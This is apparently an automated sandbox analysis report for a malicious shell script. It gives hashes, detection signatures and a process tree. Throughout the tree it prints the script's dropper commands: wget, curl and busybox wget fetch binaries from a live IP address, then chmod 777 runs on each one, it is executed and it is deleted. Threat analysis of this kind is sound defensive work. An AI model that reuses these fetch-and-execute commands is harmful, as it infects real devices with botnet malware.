Analysis
-
max time kernel
22s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:19
Static task
static1
Behavioral task
behavioral1
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
-
Size
10KB
-
MD5
a5a9f72ca25763058aacf1994a85b616
-
SHA1
748843de754f9484c22ebf1e32e5894d70f4859f
-
SHA256
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86
-
SHA512
47f9975ff7556dfa8ceecd5af09a40a67e07ddd1478bfee1cbe1189d252b5fe35d0a098fa94c5aa6aa5694f33bb0b776685ddd59772184b7d42fa2a5d78e6cea
-
SSDEEP
192:oPTGhYwtdd5GFV2ER73e7jb18jgZPTGhYwDd5GFVW73e7jVIU:QgbEo18Uftx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1522 chmod 1642 chmod 1564 chmod 1582 chmod 1630 chmod 1492 chmod 1534 chmod 1546 chmod 1552 chmod 1558 chmod 1570 chmod 1504 chmod 1606 chmod 1612 chmod 1624 chmod 1540 chmod 1576 chmod 1636 chmod 1654 chmod 1498 chmod 1648 chmod 1516 chmod 1528 chmod 1510 chmod 1600 chmod 1618 chmod 1588 chmod 1594 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 1493 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 1499 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 1505 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 1511 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 1517 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 1523 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 1529 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 1535 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 1541 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 1547 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 1553 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 1559 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 1565 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 1571 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 1577 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 1583 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 1589 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 1595 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 1601 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 1607 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 1613 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 1619 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 1625 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 1631 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 1637 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 1643 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 1649 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 1655 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl
Processes
-
/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh1⤵PID:1483
-
/bin/rm/bin/rm bins.sh2⤵PID:1484
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:1485
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Writes file to tmp directory
PID:1490
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:1491
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:1492
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:1493
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:1494
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:1495
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Writes file to tmp directory
PID:1496
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:1497
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:1498
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:1499
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:1500
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:1501
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:1503
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:1506
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:1509
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:1515
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:1521
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:1524
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:1527
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:1530
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:1531
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:1533
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:1536
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:1539
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:1542
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:1545
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:1548
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:1551
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:1554
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:1557
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:1560
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:1561
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:1563
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:1566
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:1569
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:1572
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:1575
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:1578
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:1581
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:1584
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:1587
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:1590
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:1591
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:1593
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:1596
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:1599
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:1602
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:1605
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:1608
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:1609
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:1611
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:1614
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:1615
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:1617
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:1620
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:1623
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
